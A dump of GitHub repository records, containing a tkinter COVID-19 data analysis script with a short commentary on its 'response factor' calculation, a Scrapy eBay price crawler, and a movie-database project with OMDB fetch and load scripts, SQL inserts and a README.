canvas.create_text(60,610,width=900,justify=LEFT,anchor=NW,font=\"Times 14\",text='''expectancy and response factor are barely correlated, if at all. The regression plot indicates that a significant difference in life expectancy will lead to only a minor change in the response factor. Therefore, the myth that life expectancy means better conditions for a country that faces a pandemic is not necessarily true, as it varies from case to case. 
A pandemic's effects and every country's response factor vary on many different factors, including tourism, mass transportation, government action, public action, and political/social situation.''')\ndef setup_GUI():\n canvas.delete('all')\n canvas.create_text(500,50,text=\"COVID-19 Data Analysis\",font=\"Courier 25\")\n canvas.create_text(500,100,text=\"By: Ansh Bhatti\",font=\"Courier 16\")\n c1=canvas.create_rectangle(100,150,450,400,activefill=\"#d4bf96\",fill=\"#fce8b1\")\n c2=canvas.create_rectangle(550,150,900,400,activefill=\"#d4bf96\",fill=\"#fce8b1\")\n c3=canvas.create_rectangle(100,450,450,700,activefill=\"#d4bf96\",fill=\"#fce8b1\")\n c4=canvas.create_rectangle(550,450,900,700,activefill=\"#d4bf96\",fill=\"#fce8b1\")\n c11=canvas.create_text(275,270,text=\"COVID-19 Updates and Response\\n Factor by Country\",justify=CENTER,font=\"Times 16\")\n c22=canvas.create_text(725,270,text=\"Response Factor vs Cases\",font=\"Times 16\")\n c33=canvas.create_text(275,570,text=\"Response Factor v. Global Health\\nSecurity Index\",justify=CENTER,font=\"Times 16\")\n c44=canvas.create_text(725,570,text=\"Response Factor v. Life Expectancy\",font=\"Times 16\",justify=CENTER)\n canvas.tag_bind(c1,\"<Button-1>\",updates_by_country)\n canvas.tag_bind(c11,\"<Button-1>\",updates_by_country)\n canvas.tag_bind(c2,\"<Button-1>\",rf_by_country)\n canvas.tag_bind(c22,\"<Button-1>\",rf_by_country)\n canvas.tag_bind(c3,\"<Button-1>\",rf_ghs)\n canvas.tag_bind(c33,\"<Button-1>\",rf_ghs)\n canvas.tag_bind(c4,\"<Button-1>\",acr_rf)\n canvas.tag_bind(c44,\"<Button-1>\",acr_rf)\nif os.path.exists(\"data.xlsx\"):\n f=open(\"STATUS.txt\",'r')\n r=f.readline().split()\n f.close()\n d=str(datetime.today()).split()[0]\n if d[5:8]+d[8:]+'-'+d[:4]!=r[0]:\n print(\"Please wait for updates: Last update took place on \"+r[0])\n update()\nelse:\n print(\"Please wait for the COVID cases data to be acquired...\")\n generate()\nif os.path.exists(\"ghs.csv\"):\n ghs=pd.read_csv(\"ghs.csv\")\nelse:\n print(\"Please wait for the Global Health Security Index data to be acquired\")\n acquire_ghs()\n ghs=pd.read_csv(\"ghs.csv\")\nghs_c=list(ghs[\"Country\"])\nfor a in range(len(ghs_c)):\n if ghs_c[a]==\"Czech Republic\":\n ghs_c[a]=\"Czechia\"\n elif ghs_c[a]==\"Congo Democratic Republic\":\n ghs_c[a]=\"Congo (Kinshasa)\"\n elif ghs_c[a]==\"Congo Brazzaville\":\n ghs_c[a]=\"Congo (Brazzaville)\"\n elif ghs_c[a]==\"Myanmar\":\n ghs_c[a]=\"Burma\"\n elif ghs_c[a]==\"Côte d’Ivoire\":\n ghs_c[a]=\"Cote d'Ivoire\"\n elif ghs_c[a]==\"Eswatini (Swaziland)\":\n ghs_c[a]=\"Swaziland\"\n elif ghs_c[a]==\"Guinea Bissau\":\n ghs_c[a]=\"Guinea-Bissau\"\n elif ghs_c[a]==\"Kyrgyz Republic\":\n ghs_c[a]=\"Kyrgyzstan\"\n elif ghs_c[a]==\"São Tomé and Príncipe\":\n ghs_c[a]=\"Sao Tome and Principe\"\n elif ghs_c[a]==\"St Kitts and Nevis\":\n ghs_c[a]=\"Saint Kitts and Nevis\"\n elif ghs_c[a]==\"St Lucia\":\n ghs_c[a]=\"Saint Lucia\"\n elif ghs_c[a]==\"St Vincent and The Grenadines\":\n ghs_c[a]=\"Saint Vincent and the Grenadines\"\n elif ghs_c[a]==\"Timor Leste\":\n ghs_c[a]=\"Timor-Leste\"\nghs.index=ghs_c\ndel ghs[\"Country\"]\nprint(\"Loading graphical interface\")\nsetup_GUI()\nglobal active\nglobal confirmed\nglobal recovered\nglobal deaths\nactive=pd.read_excel(\"data.xlsx\",sheet_name=\"Active\")\nconfirmed=pd.read_excel(\"data.xlsx\",sheet_name=\"Confirmed\")\nrecovered=pd.read_excel(\"data.xlsx\",sheet_name=\"Recovered\")\ndeaths=pd.read_excel(\"data.xlsx\",sheet_name=\"Deaths\")\nactive.drop([\"Diamond Princess\",\"MS Zaandam\",\"Holy 
See\",\"Western Sahara\",\"West Bank and Gaza\"],axis=1)\nconfirmed.drop([\"Diamond Princess\",\"MS Zaandam\",\"Holy See\",\"Western Sahara\",\"West Bank and Gaza\"],axis=1)\nrecovered.drop([\"Diamond Princess\",\"MS Zaandam\",\"Holy See\",\"Western Sahara\",\"West Bank and Gaza\"],axis=1)\ndeaths.drop([\"Diamond Princess\",\"MS Zaandam\",\"Holy See\",\"Western Sahara\",\"West Bank and Gaza\"],axis=1)\nactive.rename(columns={\"Korea, South\":\"South Korea\",\"Eswatini\":\"Swaziland\",\"US\":\"United States\"},inplace=True)\nrecovered.rename(columns={\"Korea, South\":\"South Korea\",\"Eswatini\":\"Swaziland\",\"US\":\"United States\"},inplace=True)\nconfirmed.rename(columns={\"Korea, South\":\"South Korea\",\"Eswatini\":\"Swaziland\",\"US\":\"United States\"},inplace=True)\ndeaths.rename(columns={\"Korea, South\":\"South Korea\",\"Eswatini\":\"Swaziland\",\"US\":\"United States\"},inplace=True)\ncountries=list(active.columns)[1:]\ncountry_rf=pd.DataFrame(index=countries,columns=[\"rf\"])\nif not os.path.exists(\"life_exp.csv\"):\n get_exp()\nlife=pd.read_csv(\"life_exp.csv\")\nlife_c=list(life[\"Country\"])\ndel life[\"Country\"]\nfor a in range(len(life_c)):\n if life_c[a]==\"Côte d'Ivoire\":\n life_c[a]=\"Cote d'Ivoire\"\n elif life_c[a]==\"DR Congo\":\n life_c[a]=\"Congo (Kinshasa)\"\n elif life_c[a]==\"Czech Republic (Czechia)\":\n life_c[a]=\"Czechia\"\n elif life_c[a]==\"Congo\":\n life_c[a]=\"Congo (Brazzaville)\"\n elif life_c[a]==\"St. Vincent & Grenadines\":\n life_c[a]=\"Saint Vincent and the Grenadines\"\n elif life_c[a]==\"Sao Tome & Principe\":\n life_c[a]=\"Sao Tome and Principe\"\n elif life_c[a]==\"Myanmar\":\n life_c[a]=\"Burma\"\n elif life_c[a]==\"Eswatini\":\n life_c[a]=\"Swaziland\"\nlife.index=life_c\nfor country in countries:\n cases=list(active[country])\n start=0\n while start<len(cases) and cases[start]==0:\n start+=1\n end=cases.index(max(cases))-start\n start=max(1,start)\n end=max(end,0)\n country_rf.at[country,\"rf\"]=end\n" } ]
6
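DESCRIPTION.txt above defines the "Response Factor" as the number of days from a country's first recorded active case to its peak in active cases, and main.py computes it in its final loop. Here is a standalone sketch of that computation; the logic mirrors main.py's loop, while the function wrapper and the toy input are added only for illustration:

```python
def response_factor(active_cases):
    # Days from the first nonzero active-case count to the peak,
    # mirroring the loop at the end of main.py.
    cases = list(active_cases)
    start = 0
    while start < len(cases) and cases[start] == 0:
        start += 1
    if start == len(cases):
        return 0  # no active cases ever recorded
    return max(cases.index(max(cases)) - start, 0)


# toy series: cases appear on day 2 and peak on day 5 -> response factor 3
print(response_factor([0, 0, 1, 4, 9, 12, 7, 3]))
```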
ReggieYang/webCrawler
https://github.com/ReggieYang/webCrawler
7102c0580601e30943bd7ff0b49dcffcece194d4
e9d8682b7f68da90b54e49e972179100f7305dae
64a96118ebbe0430bc64137540ad2f3f54b5f694
refs/heads/master
2020-09-22T10:52:15.855090
2017-11-03T16:49:01
2017-11-03T16:49:01
66,719,504
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6291457414627075, "alphanum_fraction": 0.635175883769989, "avg_line_length": 32.16666793823242, "blob_id": "b2424f8ba0537ed7a49066400b443f529dd403bb", "content_id": "2bb1c8925bd6cb746df0dfea34347e39bc8ee765", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 995, "license_type": "no_license", "max_line_length": 102, "num_lines": 30, "path": "/mySpider/spiders/ebay_item.py", "repo_name": "ReggieYang/webCrawler", "src_encoding": "UTF-8", "text": "import scrapy\nfrom scrapy.contrib.spiders import CrawlSpider, Rule\nfrom scrapy.contrib.linkextractors import LinkExtractor\n\n\nclass DmozSpider(scrapy.spiders.Spider):\n name = \"ebay_item\"\n allowed_domains = [\"ebay.com\"]\n start_urls = []\n url_prefix = \"http://www.ebay.com/itm/\"\n # rules = [Rule(LinkExtractor(allow=['/tor/\\d+']), 'parse')]\n\n file_object = open('/Users/kaimaoyang/PycharmProjects/webCrawler/mySpider/spiders/itemList', 'rb')\n\n for line in file_object:\n start_urls.append(url_prefix + str(line, encoding=\"utf-8\")[:-1])\n\n def parse(self, response):\n item = EbayItem()\n price = response.xpath('//span[@id=\\'prcIsum\\']//@content').extract()[0]\n item['price'] = price\n item['itemId'] = str(response.url)[-12:]\n item['test'] = response.xpath('//span[@id=\\'prcIsum\\']/text()').extract()[0]\n return item\n\n\nclass EbayItem(scrapy.Item):\n price = scrapy.Field()\n itemId = scrapy.Field()\n test = scrapy.Field()\n" }, { "alpha_fraction": 0.7213114500045776, "alphanum_fraction": 0.7213114500045776, "avg_line_length": 12.55555534362793, "blob_id": "d0745d5f7fb3237e3251dc5d6c874c4fea99a237", "content_id": "28c98fb82a1e1abd522d4658b73a7c6646cbb1f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 122, "license_type": "no_license", "max_line_length": 44, "num_lines": 9, "path": "/README.md", "repo_name": "ReggieYang/webCrawler", "src_encoding": "UTF-8", "text": "# webCrawler\n\n## Usage:\n\nscrapy crawl ebay_item -o $outputPath -t csv\n\nThe inputPath is in ebay_item.py\n\nBased on scrapy.\n" }, { "alpha_fraction": 0.7200000286102295, "alphanum_fraction": 0.7200000286102295, "avg_line_length": 14, "blob_id": "7ad0cbc244878ede6f6a36d7b546fb4db8186fe1", "content_id": "73c585f1ca0f9707b84a90fa60b9662caad5daff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 75, "license_type": "no_license", "max_line_length": 31, "num_lines": 5, "path": "/mySpider/spiders/myItem.py", "repo_name": "ReggieYang/webCrawler", "src_encoding": "UTF-8", "text": "import scrapy\n\n\nclass TorrentItem(scrapy.Item):\n price = scrapy.Field()\n" } ]
3
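The webCrawler README above invokes the spider from the shell (`scrapy crawl ebay_item -o $outputPath -t csv`). For completeness, a hedged sketch of the equivalent programmatic run via Scrapy's `CrawlerProcess`; the import path for `DmozSpider` is assumed from the repo layout, and the legacy `FEED_FORMAT`/`FEED_URI` settings are used to match the old `scrapy.contrib`-era Scrapy this spider targets:

```python
from scrapy.crawler import CrawlerProcess

# spider class defined in mySpider/spiders/ebay_item.py (import path assumed)
from mySpider.spiders.ebay_item import DmozSpider

process = CrawlerProcess(settings={
    "FEED_FORMAT": "csv",      # equivalent of `-t csv`
    "FEED_URI": "output.csv",  # equivalent of `-o output.csv`
})
process.crawl(DmozSpider)
process.start()  # blocks until the crawl finishes
```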
shashwatblack/justmovies
https://github.com/shashwatblack/justmovies
53c3b9a3f598312dc327cdd30f11faf35cebf816
fa17a520a1c94d08f7baf1f4f3d6418ad2ac3614
a76d52253fa2055a76d5cec123a90728b7784832
refs/heads/master
2020-04-10T20:00:30.977750
2018-12-11T00:38:15
2018-12-11T00:38:15
161,254,113
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.47753217816352844, "alphanum_fraction": 0.4855477213859558, "avg_line_length": 39.36274337768555, "blob_id": "d83900b44ce6d07f6018d1b16dd919b7834eca7e", "content_id": "70388c5f829a7d47e85e2befe646a28d99f1e091", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4117, "license_type": "no_license", "max_line_length": 95, "num_lines": 102, "path": "/data/jumbo_load.py", "repo_name": "shashwatblack/justmovies", "src_encoding": "UTF-8", "text": "import csv\nimport ast\nimport sys\nimport os.path\nfrom utils.db_utils import DatabaseUtils, MockCursor\n\nsys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir))\n\n\ndef jumbo_load():\n count = 0\n max_count = 10000\n db_utils = DatabaseUtils()\n with open(\"movies.csv\", errors='ignore') as f1:\n with open(\"movies_with_omdb.csv\", errors='ignore') as f2:\n rows = zip(csv.reader(f1), csv.reader(f2))\n headers = next(rows)\n for basic, omdb_row in rows:\n omdb = ast.literal_eval(omdb_row[2])\n if omdb[\"Response\"] == \"False\":\n continue\n # we have a clean 'row'\n\n # PEOPLE\n director = basic[3]\n actor = basic[11]\n writer = basic[13]\n\n db_director = db_utils.get_person(director)\n db_actor = db_utils.get_person(actor)\n db_writer = db_utils.get_person(writer)\n\n if not db_director:\n db_director = db_utils.insert_then_get_person(director)\n if not db_actor:\n db_actor = db_utils.insert_then_get_person(actor)\n if not db_writer:\n db_writer = db_utils.insert_then_get_person(writer)\n\n # ROLES\n director_role = db_utils.get_personal_role(db_director, \"Director\")\n actor_role = db_utils.get_personal_role(db_actor, \"Actor\")\n writer_role = db_utils.get_personal_role(db_writer, \"Writer\")\n\n if not director_role:\n db_utils.insert_role(db_director, \"Director\")\n if not actor_role:\n db_utils.insert_role(db_actor, \"Actor\")\n if not writer_role:\n db_utils.insert_role(db_writer, \"Writer\")\n\n # MOVIE\n title = basic[6]\n year = basic[14]\n movie = db_utils.get_movie(title, year)\n genre = db_utils.get_genre(basic[4])\n mpaa_rating = db_utils.get_mpaa_rating(basic[7])\n country = db_utils.get_country(basic[2])\n language = db_utils.get_language(omdb[\"Language\"].split(',')[0].strip())\n if not movie:\n movie = db_utils.insert_then_get_movie(title, year, {\n \"company\": basic[1],\n \"budget\": basic[0],\n \"gross\": basic[5],\n \"released\": basic[8],\n \"runtime\": basic[9],\n \"plot\": omdb[\"Plot\"],\n \"awards\": omdb[\"Awards\"],\n \"poster\": omdb[\"Poster\"],\n \"website\": omdb[\"Website\"],\n \"imdb_rating\": omdb[\"imdbRating\"],\n \"imdb_id\": omdb[\"imdbID\"],\n \"genre\": genre[0] if genre else None,\n \"rating\": mpaa_rating[0] if mpaa_rating else None,\n \"country\": country[0] if country else None,\n \"language\": language[0] if language else None\n })\n\n # INVOLVEMENT\n director_involvement = db_utils.get_involvement(db_director, movie, \"Director\")\n actor_involvement = db_utils.get_involvement(db_actor, movie, \"Actor\")\n writer_involvement = db_utils.get_involvement(db_writer, movie, \"Writer\")\n\n if not director_involvement:\n db_utils.insert_involvement(db_director, movie, \"Director\")\n\n if not actor_involvement:\n db_utils.insert_involvement(db_actor, movie, \"Actor\")\n\n if not writer_involvement:\n db_utils.insert_involvement(db_writer, movie, \"Writer\")\n\n db_utils.commit()\n\n count += 1\n print(\"DONE \" + str(count))\n if count >= max_count:\n break\n\n\nif __name__ == \"__main__\":\n 
jumbo_load()\n" }, { "alpha_fraction": 0.43520089983940125, "alphanum_fraction": 0.44538766145706177, "avg_line_length": 28.450000762939453, "blob_id": "7a1ca6282412d3cc3ad03e4c07a8baf07ac42ce7", "content_id": "13c78fc57a981d1a39314bdbba31652ccd93a9ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1767, "license_type": "no_license", "max_line_length": 81, "num_lines": 60, "path": "/data/omdb_fetch.py", "repo_name": "shashwatblack/justmovies", "src_encoding": "UTF-8", "text": "import csv\nimport requests\n\nomdb_url = \"http://www.omdbapi.com/\"\n\n\nclass OmdbKey:\n    keys = []\n    current_key_index = None\n\n    def load_keys(self):\n        with open('omdb_keys.txt') as keysfile:\n            keys = keysfile.readlines()\n\n        self.keys = [{\n            \"key\": k.strip(),\n            \"used\": 0\n        } for k in keys]\n        self.current_key_index = 0\n\n    def get_key(self):\n        if not self.keys:\n            return None\n        current_key = self.keys[self.current_key_index]\n        return current_key[\"key\"]\n\n    def next(self):\n        self.current_key_index += 1\n        print(\"----------------------------------------------------------------\")\n        print(\"switched key to \", self.current_key_index)\n        print(\"----------------------------------------------------------------\")\n\n\nomdb_key = OmdbKey()\nomdb_key.load_keys()\n\nwith open('movies_with_omdb.csv', mode='w', newline='') as export_file:\n    writer = csv.writer(export_file)\n    with open('movies.csv') as csvfile:\n        reader = csv.reader(csvfile)\n        headers = next(reader)\n        writer.writerow([\"title\",\"year\",\"omdb_data\"])\n\n        count = 0\n        for row in reader:\n            while True:\n                print(\"FETCHING\", row[6], row[14])\n                r = requests.get(omdb_url, params={\n                    \"t\": row[6],\n                    \"y\": row[14],\n                    \"apikey\": omdb_key.get_key()\n                })\n                if r.status_code == 200:\n                    row.append(r.json())\n                    writer.writerow([row[6],row[14],r.json()])\n                    count += 1\n                    print(\"DONE \", count, r.status_code, row[6])\n                    break\n                else:\n                    omdb_key.next()\n" }, { "alpha_fraction": 0.70188969373703, "alphanum_fraction": 0.7024039030075073, "avg_line_length": 50.17763137817383, "blob_id": "39784f675b8013bb8451f698f55e5d0327a4b61f", "content_id": "f7873c3817cab46a757f42e4287c26937bed74f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 7779, "license_type": "no_license", "max_line_length": 64, "num_lines": 152, "path": "/data/languages.sql", "repo_name": "shashwatblack/justmovies", "src_encoding": "UTF-8", "text": "INSERT INTO language (\"name\") VALUES ('Aboriginal');\nINSERT INTO language (\"name\") VALUES ('Acholi');\nINSERT INTO language (\"name\") VALUES ('Afrikaans');\nINSERT INTO language (\"name\") VALUES ('Akan');\nINSERT INTO language (\"name\") VALUES ('Albanian');\nINSERT INTO language (\"name\") VALUES ('Algonquin');\nINSERT INTO language (\"name\") VALUES ('American Sign Language');\nINSERT INTO language (\"name\") VALUES ('Ancient (to 1453)');\nINSERT INTO language (\"name\") VALUES ('Apache languages');\nINSERT INTO language (\"name\") VALUES ('Arabic');\nINSERT INTO language (\"name\") VALUES ('Aramaic');\nINSERT INTO language (\"name\") VALUES ('Armenian');\nINSERT INTO language (\"name\") VALUES ('Assyrian Neo-Aramaic');\nINSERT INTO language (\"name\") VALUES ('Awadhi');\nINSERT INTO language (\"name\") VALUES ('Azerbaijani');\nINSERT INTO language (\"name\") VALUES ('Bambara');\nINSERT INTO language (\"name\") VALUES ('Belarusian');\nINSERT INTO language (\"name\") VALUES ('Bengali');\nINSERT INTO language (\"name\") VALUES 
('Berber languages');\nINSERT INTO language (\"name\") VALUES ('Bosnian');\nINSERT INTO language (\"name\") VALUES ('British Sign Language');\nINSERT INTO language (\"name\") VALUES ('Bulgarian');\nINSERT INTO language (\"name\") VALUES ('Cantonese');\nINSERT INTO language (\"name\") VALUES ('Catalan');\nINSERT INTO language (\"name\") VALUES ('Chinese');\nINSERT INTO language (\"name\") VALUES ('Cornish');\nINSERT INTO language (\"name\") VALUES ('Corsican');\nINSERT INTO language (\"name\") VALUES ('Cree');\nINSERT INTO language (\"name\") VALUES ('Croatian');\nINSERT INTO language (\"name\") VALUES ('Czech');\nINSERT INTO language (\"name\") VALUES ('Danish');\nINSERT INTO language (\"name\") VALUES ('Dari');\nINSERT INTO language (\"name\") VALUES ('Dutch');\nINSERT INTO language (\"name\") VALUES ('Eastern Frisian');\nINSERT INTO language (\"name\") VALUES ('Egyptian (Ancient)');\nINSERT INTO language (\"name\") VALUES ('English');\nINSERT INTO language (\"name\") VALUES ('Esperanto');\nINSERT INTO language (\"name\") VALUES ('Estonian');\nINSERT INTO language (\"name\") VALUES ('Filipino');\nINSERT INTO language (\"name\") VALUES ('Finnish');\nINSERT INTO language (\"name\") VALUES ('Flemish');\nINSERT INTO language (\"name\") VALUES ('French');\nINSERT INTO language (\"name\") VALUES ('French Sign Language');\nINSERT INTO language (\"name\") VALUES ('Gallegan');\nINSERT INTO language (\"name\") VALUES ('Georgian');\nINSERT INTO language (\"name\") VALUES ('German');\nINSERT INTO language (\"name\") VALUES ('Greek');\nINSERT INTO language (\"name\") VALUES ('Greenlandic');\nINSERT INTO language (\"name\") VALUES ('Guarani');\nINSERT INTO language (\"name\") VALUES ('Gujarati');\nINSERT INTO language (\"name\") VALUES ('Hakka');\nINSERT INTO language (\"name\") VALUES ('Hawaiian');\nINSERT INTO language (\"name\") VALUES ('Hebrew');\nINSERT INTO language (\"name\") VALUES ('Hindi');\nINSERT INTO language (\"name\") VALUES ('Hmong');\nINSERT INTO language (\"name\") VALUES ('Hokkien');\nINSERT INTO language (\"name\") VALUES ('Hungarian');\nINSERT INTO language (\"name\") VALUES ('Ibo');\nINSERT INTO language (\"name\") VALUES ('Icelandic');\nINSERT INTO language (\"name\") VALUES ('Indonesian');\nINSERT INTO language (\"name\") VALUES ('Inuktitut');\nINSERT INTO language (\"name\") VALUES ('Irish');\nINSERT INTO language (\"name\") VALUES ('Italian');\nINSERT INTO language (\"name\") VALUES ('Japanese');\nINSERT INTO language (\"name\") VALUES ('Japanese Sign Language');\nINSERT INTO language (\"name\") VALUES ('Khmer');\nINSERT INTO language (\"name\") VALUES ('Kirundi');\nINSERT INTO language (\"name\") VALUES ('Klingon');\nINSERT INTO language (\"name\") VALUES ('Korean');\nINSERT INTO language (\"name\") VALUES ('Korean Sign Language');\nINSERT INTO language (\"name\") VALUES ('Kurdish');\nINSERT INTO language (\"name\") VALUES ('Ladino');\nINSERT INTO language (\"name\") VALUES ('Lao');\nINSERT INTO language (\"name\") VALUES ('Latin');\nINSERT INTO language (\"name\") VALUES ('Lingala');\nINSERT INTO language (\"name\") VALUES ('Luxembourgish');\nINSERT INTO language (\"name\") VALUES ('Macedonian');\nINSERT INTO language (\"name\") VALUES ('Malay');\nINSERT INTO language (\"name\") VALUES ('Malinka');\nINSERT INTO language (\"name\") VALUES ('Mandarin');\nINSERT INTO language (\"name\") VALUES ('Maori');\nINSERT INTO language (\"name\") VALUES ('Mapudungun');\nINSERT INTO language (\"name\") VALUES ('Maya');\nINSERT INTO language (\"name\") VALUES ('Mende');\nINSERT INTO 
language (\"name\") VALUES ('Min Nan');\nINSERT INTO language (\"name\") VALUES ('Mohawk');\nINSERT INTO language (\"name\") VALUES ('Mongolian');\nINSERT INTO language (\"name\") VALUES ('N/A');\nINSERT INTO language (\"name\") VALUES ('Navajo');\nINSERT INTO language (\"name\") VALUES ('Neapolitan');\nINSERT INTO language (\"name\") VALUES ('None');\nINSERT INTO language (\"name\") VALUES ('Norse');\nINSERT INTO language (\"name\") VALUES ('North American Indian');\nINSERT INTO language (\"name\") VALUES ('Norwegian');\nINSERT INTO language (\"name\") VALUES ('Occitan');\nINSERT INTO language (\"name\") VALUES ('Ojibwa');\nINSERT INTO language (\"name\") VALUES ('Old');\nINSERT INTO language (\"name\") VALUES ('Old English');\nINSERT INTO language (\"name\") VALUES ('Panjabi');\nINSERT INTO language (\"name\") VALUES ('Papiamento');\nINSERT INTO language (\"name\") VALUES ('Pawnee');\nINSERT INTO language (\"name\") VALUES ('Persian');\nINSERT INTO language (\"name\") VALUES ('Polish');\nINSERT INTO language (\"name\") VALUES ('Portuguese');\nINSERT INTO language (\"name\") VALUES ('Punjabi');\nINSERT INTO language (\"name\") VALUES ('Pushto');\nINSERT INTO language (\"name\") VALUES ('Quechua');\nINSERT INTO language (\"name\") VALUES ('Quenya');\nINSERT INTO language (\"name\") VALUES ('Rajasthani');\nINSERT INTO language (\"name\") VALUES ('Romanian');\nINSERT INTO language (\"name\") VALUES ('Romany');\nINSERT INTO language (\"name\") VALUES ('Russian');\nINSERT INTO language (\"name\") VALUES ('Saami');\nINSERT INTO language (\"name\") VALUES ('Sanskrit');\nINSERT INTO language (\"name\") VALUES ('Scanian');\nINSERT INTO language (\"name\") VALUES ('Scots');\nINSERT INTO language (\"name\") VALUES ('Scottish Gaelic');\nINSERT INTO language (\"name\") VALUES ('Serbian');\nINSERT INTO language (\"name\") VALUES ('Serbo-Croatian');\nINSERT INTO language (\"name\") VALUES ('Shanghainese');\nINSERT INTO language (\"name\") VALUES ('Sicilian');\nINSERT INTO language (\"name\") VALUES ('Sign Languages');\nINSERT INTO language (\"name\") VALUES ('Sindarin');\nINSERT INTO language (\"name\") VALUES ('Sioux');\nINSERT INTO language (\"name\") VALUES ('Slovak');\nINSERT INTO language (\"name\") VALUES ('Somali');\nINSERT INTO language (\"name\") VALUES ('Southern Sotho');\nINSERT INTO language (\"name\") VALUES ('Spanish');\nINSERT INTO language (\"name\") VALUES ('Spanish Sign Language');\nINSERT INTO language (\"name\") VALUES ('Swahili');\nINSERT INTO language (\"name\") VALUES ('Swedish');\nINSERT INTO language (\"name\") VALUES ('Swiss German');\nINSERT INTO language (\"name\") VALUES ('Syriac');\nINSERT INTO language (\"name\") VALUES ('Tagalog');\nINSERT INTO language (\"name\") VALUES ('Tamil');\nINSERT INTO language (\"name\") VALUES ('Telugu');\nINSERT INTO language (\"name\") VALUES ('Thai');\nINSERT INTO language (\"name\") VALUES ('Tibetan');\nINSERT INTO language (\"name\") VALUES ('Tok Pisin');\nINSERT INTO language (\"name\") VALUES ('Tonga');\nINSERT INTO language (\"name\") VALUES ('Tswana');\nINSERT INTO language (\"name\") VALUES ('Tupi');\nINSERT INTO language (\"name\") VALUES ('Turkish');\nINSERT INTO language (\"name\") VALUES ('Ukrainian');\nINSERT INTO language (\"name\") VALUES ('Ungwatsi');\nINSERT INTO language (\"name\") VALUES ('Urdu');\nINSERT INTO language (\"name\") VALUES ('Vietnamese');\nINSERT INTO language (\"name\") VALUES ('Welsh');\nINSERT INTO language (\"name\") VALUES ('Wolof');\nINSERT INTO language (\"name\") VALUES ('Xhosa');\nINSERT INTO language 
(\"name\") VALUES ('Yiddish');\nINSERT INTO language (\"name\") VALUES ('Zulu');\n" }, { "alpha_fraction": 0.713185727596283, "alphanum_fraction": 0.713185727596283, "avg_line_length": 24.341463088989258, "blob_id": "6f248cfb7731d38ef67ed5eec9d6323042083037", "content_id": "33264e18106689f1c3f0e147a3dab32f115bbe93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1039, "license_type": "no_license", "max_line_length": 85, "num_lines": 41, "path": "/data/data_load.py", "repo_name": "shashwatblack/justmovies", "src_encoding": "UTF-8", "text": "import os.path, sys\nsys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir))\n\nfrom utils.db_utils import DatabaseUtils\nfrom jumbo_load import jumbo_load\n\n# connection to the database\ndb_utils = DatabaseUtils()\nconnection = db_utils.get_connection()\ncursor = db_utils.get_cursor()\n\n# LET'S FIRST CREATE THE SCHEMA\nprint('creating schemas..')\ncursor.execute(open(\"schema.sql\", \"r\").read())\ndb_utils.commit()\n\n# NOW WE'LL ADD THE DATA\nprint('inserting countries..')\ncursor.execute(open(\"countries.sql\", \"r\").read())\ndb_utils.commit()\n\nprint('inserting ratings..')\ncursor.execute(open(\"ratings.sql\", \"r\").read())\ndb_utils.commit()\n\nprint('inserting languages..')\ncursor.execute(open(\"languages.sql\", \"r\").read())\ndb_utils.commit()\n\nprint('inserting genres..')\ncursor.execute(open(\"genres.sql\", \"r\").read())\ndb_utils.commit()\n\nprint('inserting movies, people and roles...')\njumbo_load()\n\nprint('running custom queries..')\ncursor.execute(open(\"custom_queries.sql\", \"r\").read())\ndb_utils.commit()\n\nprint(\"ALL DONE!\")\n" }, { "alpha_fraction": 0.734393835067749, "alphanum_fraction": 0.7488551735877991, "avg_line_length": 43.6129035949707, "blob_id": "c535f4795995c046870a63afcfab8dd264633a79", "content_id": "018886997b078d09e756308769a9827542bbd162", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4149, "license_type": "no_license", "max_line_length": 195, "num_lines": 93, "path": "/README.md", "repo_name": "shashwatblack/justmovies", "src_encoding": "UTF-8", "text": "\n# JUST MOVIES\n\n## What is it?\n\nJust Movies is a simple movie and celebrity directory. The cherry on the cake is the `data` feature, which runs analytical queries on the available data set and presents them in beautiful charts.\n\nThis work is done as a course project for Database Systems (TAMU CSCE 608). The author is Shashwat Shashi Mehta. UIN: **827008698**\n\n## What are its features?\n 1. Just Movies\n\t- Grid of movie posters and names\n\t- Paginated 20 per page\n\t- Ability to apply following filters\n\t\t- Title (supports substring search)\n\t\t- Company (supports substring search)\n\t\t- Year (supports ranges `from`-`to`)\n\t\t- IMDB Rating\n\t- Link to IMDB page under each movie poster\n\t- Link to edit page\n 2. Just People\n\t- Search any celebrity by their name (supports substring search)\n\t- Will show data for the best match\n\t- Date of Birth, Roles, Introduction, and Filmography\n 3. 
Just Data\n\t- Lots of beautiful and insightful charts\n\t- General bird's-eye view stats\n\t\t- Total # of movies in system\n\t\t- Total # of celebrities in system\n\t\t- Total budget of all movies\n\t\t- Total reviews received (Note: `Reviews` feature hasn't been developed yet)\n\t- Pie Charts\n\t\t- Movie count distribution by genre\n\t\t- Movie count distribution by country\n\t\t- Movie count distribution by language\n\t\t- Movie budget distribution by genre\n\t\t- Movie budget distribution by country\n\t\t- Movie budget distribution by language\n\t- Budgets by year\n\t - Bar graph showing the total budget pattern from year to year\n\t- Celebrity Stats\n\t\t- Top 10 celebrities involved in at least 10 movies.\n\t\t\t- The ranking is based on average imdb rating for each of the movies they worked in.\n\t\t- Celebrity Role Distribution Venn Diagram\n\t\t\t- How many actors+writers are there?\n\t\t\t- Is writer+director role more common than actor+director?\n 4. Movie Edit\n\t- Edit any of the movie's fields\n\t- Fixed fields are provided as select dropdown\n\t- Ability to delete the movie entirely from the system.\n\t\t- This will also delete all the associated celebrity involvements and reviews from the system.\n\n## How was the data collected?\n 1. The initial data was downloaded from kaggle - https://www.kaggle.com/danielgrijalvas/movies\n 2. Additional data, such as posters, imdb id and so on were fetched using the OMDB API - omdbapi.com\n 3. A python script `omdb_fetch.py` was written to fetch data in batches over a period of few days (due to API limitations).\n 4. All the data was collected in two CSVs - 